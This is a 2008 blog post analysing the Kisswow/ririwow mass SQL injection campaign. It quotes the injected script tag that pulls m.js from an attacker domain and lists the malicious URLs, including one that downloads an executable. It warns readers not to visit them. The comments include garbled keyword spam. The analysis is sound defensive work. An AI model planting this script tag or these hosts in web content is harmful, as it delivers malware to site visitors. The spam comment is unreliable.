Kisswow SQL Injection Attack

by Willie Wheeler

Saturday, May 10, 2008

Some initial research on the Kisswow SQL injection attack.

If you search Google for 'kisswow' or 'ririwow', you will see that a bunch of web sites were hit with a SQL injection attack sometime recently. These are part of the same attack. I wanted to post some initial analysis I did on this so that others might benefit. This analysis is pretty tentative, but I'm hoping that others can either expand upon or correct it as necessary.

IN WHAT FOLLOWS, DO NOT DOWNLOAD THE SCRIPTS UNLESS YOU KNOW WHAT YOU'RE DOING! YOU WILL END UP WITH MALWARE ON YOUR MACHINE. I used lynx to download the scripts so that I could see them without causing any problems.

So it looks like the basic idea behind the attack is to use SQL injection to insert malicious JavaScript into databases of public-facing sites. The web application then displays the malicious script on the web and people download it. If you're on Windows, then the download can cause problems for you.

In this case the script in question is the following:

*** DO NOT DOWNLOAD THIS MALICIOUS SCRIPT! ***
<script src=http://www.kisswow.com.cn/m.js></script>

This script creates an invisible iframe on your web page that in turn downloads an HTML page at the following URL:

*** DO NOT VISIT THIS MALICIOUS URL! ***
www.ririwow.cn/index.htm

The page just mentioned includes three iframes and some indelicate words about France and CNN:

F*** FRANCE! F*** CNN! I WILL ATTACK you ALWAYS ! IF YOU WANT TO SAY SOMETHING . PLEASE SEND EMAIL TO kiss117276@163.com

Here's what the iframes appear to be doing:

iframe #1 at MALICIOUS URL www.ririwow.cn/14.htm: Uses Microsoft.XMLHTTP to download a MALICIOUS executable at http://dj.jueduizuan.com/ri.exe into your temp directory (whatever you have for the TMP environment variable). I have no idea what ri.exe does as I did not want to run it on my machine.

iframe #2 at MALICIOUS URL www.ririwow.cn/real.htm: Looks like some kind of RealPlayer exploit designed to annoy the end user. I'm just guessing from the source code but it looks like it plays a video of a clock and plays a lot of annoying sounds, including a NetMeeting test sound, a buzzing bee sound, tada.wav, chimes.wav and LoopyMusic.wav.

iframe #3 at MALICIOUS URL www.ririwow.cn/07004.htm: Looks like it flashes a bunch of colors on the screen but I can't tell for sure.

Anyway, a lot of sites were hit by this one so I wanted to put some initial research out there. Elaborations/corrections welcome.

Comments (4)

Some useful links:

http://blog.wired.com/monkeybites/2008/04/microsoft-datab.html

http://hackademix.net/2008/04/26/mass-attack-faq/

By Willie Wheeler on May 12, 2008 at 12:52 PM PDT

Another interesting piece of information regarding the m.js script. It checks to see if your browser language is set to Chinese, and if not then it sends you to the ririwow.cn site.

See http://isc.sans.org/ for details.

By Willie Wheeler on May 14, 2008 at 1:33 PM PDT

Dio cane!

By dio cane on Jul 13, 2009 at 6:20 AM PDT

he myth of pandora is ancient, appears in several distinct Greek versions, pandora armbandand has been interpreted in many ways. In all literary versions, Neu Eingetroffen however, Pandora Armb�nder the myth is a rosetta stone kind of theodicy, addressing the question pop information, web easy get, sports fashion, news-fashionof why there is evil in the world. In the seventh hot-winter century BC, Hesiod, both in his Theogony (briefly, without naming Pandora outright rosetta stone language, rosetta stone spanish, abercrombie and fitch, Abercrombie Fitch

By pandora schmuck on Aug 30, 2010 at 11:07 PM PDT

Kisswow SQL Injection Attack

Comments (4)

Post a comment

What's New?